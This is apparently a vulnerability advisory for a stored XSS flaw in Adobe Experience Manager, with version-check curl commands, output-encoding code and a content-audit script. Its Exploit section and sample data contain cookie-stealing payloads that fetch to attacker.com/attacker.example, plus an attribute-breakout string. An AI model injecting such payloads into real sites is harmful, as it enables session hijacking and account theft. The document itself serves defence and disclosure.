A low-privileged attacker with a valid AEM account can exploit CVE-2026-47972, a stored cross-site scripting vulnerability, by injecting malicious JavaScript into unsanitized form fields. When an administrator or other user with higher privileges views the page containing the attacker-controlled form input, the script executes in their browser context. Because the vulnerability is stored, the payload persists across sessions, affecting every subsequent visitor to the compromised page.
The root cause is improper neutralization of user-controllable input before it is placed in output that is served to other users. Attackers inject script tags or event handlers into vulnerable fields such as text inputs, rich text editors, or custom metadata fields. The injected code survives database persistence and is reflected back unsanitized when the page is rendered. The attack requires user interaction: the victim must browse to the affected page. The CVSS score is 5.4 (MEDIUM) with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N.
The scope is changed because the XSS vulnerability allows execution in a security context that may grant access to data or functionality beyond the attacker’s direct privileges. Typical impacts include session hijacking, defacement, forced redirection to malicious sites, or theft of CSRF tokens. Exploitation does not require advanced skills; an attacker can leverage built-in browser APIs to exfiltrate data. Adobe has not observed in-the-wild exploitation of this specific CVE, but the ubiquity of XSS in enterprise CMS makes it a frequent target during audit or red-team exercises. The vulnerability affects all versions of AEM 6.5 up to 6.5.24, LTS SP1, and AEM 2026.04 and earlier. Patched versions include AEM Cloud Service Release 2026.05, 6.5 LTS Service Pack 2, and 6.5 Service Pack 25.
DailyCVE Form:
Platform: AEM
Version: ≤2026.04
Vulnerability: stored XSS
Severity: Medium (5.4)
Date: 2026-06-09
Prediction: AEM 2026.05
What Undercode Say:
```bash
# Check AEM version via CRXDE
curl -s -u admin:admin "http://localhost:4502/crx/de/version.jsp" | grep "Version"

# Check version via product info
curl -s -u admin:admin "http://localhost:4502/system/console/status-productinfo" | grep "Adobe Experience Manager"

# Enumerate installed service packs
curl -s "http://localhost:4502/libs/granite/security/currentuser.json" | grep -A5 "service.pack"

# Detect vulnerable versions: Cloud Service before 2026.05, on-prem 6.5 before SP25
# (a plain string compare is not enough, because "6.5.24" sorts after "2026.05")
aem_version=$(curl -s -u admin:admin "http://localhost:4502/crx/de/version.jsp" | grep -oP 'Version \K[0-9.]+')
case "$aem_version" in
  6.5.*)  # service pack level is the third component; 6.5 LTS is not distinguished here
    sp=$(echo "$aem_version" | cut -d. -f3)
    [ "${sp:-0}" -lt 25 ] && echo "VULNERABLE to CVE-2026-47972 (6.5 SP$sp, fixed in SP25)" ;;
  *)      # year.month releases are fixed-width, so string order is release order
    [[ "$aem_version" < "2026.05" ]] && echo "VULNERABLE to CVE-2026-47972 ($aem_version, fixed in 2026.05)" ;;
esac
```
Example safe output filter (server-side)
```php
// Trim, undo legacy magic-quotes escaping, then HTML-encode. ENT_QUOTES encodes
// both quote styles, so the value is safe in element bodies and quoted attributes.
function sanitize_input($data) {
    $data = trim($data);
    $data = stripslashes($data);
    $data = htmlspecialchars($data, ENT_QUOTES, 'UTF-8');
    return $data;
}
```
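The root-cause paragraph above describes stored input reaching the rendered page without neutralization, and the PHP filter shows the encoding step. The following Python example (added here, not code from the advisory or from Adobe) puts the two side by side: a template that interpolates a stored value verbatim, next to one that encodes it with `html.escape(quote=True)`, the equivalent of `ENT_QUOTES`. The sample values, including the event-handler payload and an attribute-breakout string, are constructed for the demo.

```python
import html

# Constructed sample values a low-privileged user might store in a form field
# (made up for this demo, not taken from any real AEM instance).
EVENT_HANDLER_PAYLOAD = (
    '<img src=x onerror="fetch(\'https://attacker.example/steal?c=\'+document.cookie)">'
)
ATTRIBUTE_BREAKOUT = 'x" autofocus onfocus="alert(1)'
BENIGN_TEXT = "Tom & Jerry <3 this page"


def render_unsafe(value: str) -> str:
    """Vulnerable pattern: the stored value is interpolated into the template
    verbatim, once inside a quoted attribute and once in the element body."""
    return f'<div class="comment" data-title="{value}">{value}</div>'


def render_safe(value: str) -> str:
    """Hardened pattern: encode for HTML output before interpolation.
    quote=True also encodes " and ' so the value cannot close the data-title
    attribute and start a new one (autofocus/onfocus in ATTRIBUTE_BREAKOUT)."""
    encoded = html.escape(value, quote=True)
    return f'<div class="comment" data-title="{encoded}">{encoded}</div>'


def compare(value: str) -> dict:
    """Both renderings of one value, for inspection or assertions."""
    return {"unsafe": render_unsafe(value), "safe": render_safe(value)}


if __name__ == "__main__":
    for label, value in (
        ("event handler", EVENT_HANDLER_PAYLOAD),
        ("attribute breakout", ATTRIBUTE_BREAKOUT),
        ("benign", BENIGN_TEXT),
    ):
        result = compare(value)
        print(f"--- {label}\nunsafe: {result['unsafe']}\nsafe:   {result['safe']}")
```

Note that encoding is applied at output, for the HTML body and quoted-attribute contexts; a value destined for a URL, a JavaScript string or an unquoted attribute needs the encoding for that context instead.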
Exploit
No public exploit is currently available. However, the attack vector is straightforward: using an authenticated session, submit a form field containing `` or a more complex payload like <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">. The payload is stored in the AEM JCR repository and executed whenever any user, including administrators, views the affected page. The attack requires user interaction (the victim loads the page) and low privileges (any authenticated user can submit content).
Protection
- Upgrade to AEM Cloud Service Release 2026.05, 6.5 LTS Service Pack 2, or 6.5 Service Pack 25.
- Apply the official Adobe patch APSB26-56 immediately.
- Enable Content Security Policy (CSP) headers to restrict script execution.
- Implement output encoding in all JSP/HTL templates using `xss="safe"` or `context="html"`.
- Regularly audit user-submitted content with a WAF or manual inspection.
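The last bullet asks for regular audits of user-submitted content. The example below (added here; not a tool from the advisory, Adobe or Undercode) shows what such an audit can look like: it tokenizes each stored string property with the standard-library HTML parser and flags active elements, `on*` event handlers and `javascript:`/`data:` URLs, the classes of payload the advisory describes. The property paths and values are constructed for the demo; a real run would feed it exported JCR properties. It is a review aid that surfaces candidates for manual inspection, not a replacement for output encoding.

```python
from __future__ import annotations

import re
from html.parser import HTMLParser

# Constructed sample of stored string properties, shaped like what a content
# audit would pull from a JCR export. Paths and values are made up for the
# demo, not taken from any real repository or from the advisory.
SAMPLE_CONTENT = {
    "/content/site/comments/1/jcr:text": "Great article, thanks!",
    "/content/site/comments/2/jcr:text": (
        '<img src=x onerror="fetch(\'https://attacker.example/steal?c=\'+document.cookie)">'
    ),
    "/content/site/comments/3/jcr:text": '<a href="javascript:alert(document.domain)">click</a>',
    "/content/site/comments/4/jcr:text": "<p>Plain <b>formatting</b> only</p>",
    "/content/site/comments/5/jcr:text": "<script>alert(1)</script>",
}

# Elements that execute or load active content and so do not belong in
# user-authored text; attributes that carry a URL; schemes that run code.
ACTIVE_TAGS = {"script", "iframe", "object", "embed", "base"}
URL_ATTRS = {"href", "src", "action", "formaction", "data"}
ACTIVE_SCHEMES = {"javascript", "vbscript", "data"}


class ActiveContentFinder(HTMLParser):
    """Walks markup with the standard-library tokenizer. The parser lower-cases
    tag and attribute names and decodes entity references in attribute values,
    so <IMG OnError=...> and href="java&#115;cript:..." are still caught."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag: str, attrs: list[tuple[str, str | None]]) -> None:
        if tag in ACTIVE_TAGS:
            self.findings.append(f"active tag <{tag}>")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")
            elif name in URL_ATTRS and value:
                # Strip whitespace and control characters before reading the
                # scheme, so "java\nscript:" normalises to "javascript".
                scheme = re.sub(r"[\s\x00-\x1f]", "", value).split(":", 1)[0].lower()
                if scheme in ACTIVE_SCHEMES:
                    self.findings.append(f"{scheme}: URL in {name} on <{tag}>")


def audit_field(value: str) -> list[str]:
    """Findings for one stored value; an empty list means nothing active was seen."""
    finder = ActiveContentFinder()
    finder.feed(value)
    finder.close()
    return finder.findings


def audit_repository(props: dict[str, str]) -> dict[str, list[str]]:
    """Map each property path that has at least one finding to its findings."""
    report: dict[str, list[str]] = {}
    for path, value in props.items():
        findings = audit_field(value)
        if findings:
            report[path] = findings
    return report


if __name__ == "__main__":
    for path, findings in audit_repository(SAMPLE_CONTENT).items():
        print(path)
        for finding in findings:
            print("   ", finding)
```

Plain formatting markup passes; the three properties carrying an event handler, a `javascript:` link and a `<script>` element are reported with their path, which is what a reviewer needs to locate and remove the content.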
Impact
Successful exploitation leads to execution of arbitrary JavaScript in the victim’s browser. This can result in session hijacking, theft of sensitive data (including CSRF tokens and AEM internal API keys), account takeover if session cookies are stolen, defacement of the AEM site, and pivoting to internal network resources if the victim has elevated privileges. While confidentiality and integrity impacts are LOW per CVSS, the changed scope means an attacker could potentially access resources outside the original vulnerable component.
Sources:
Reported By: nvd.nist.gov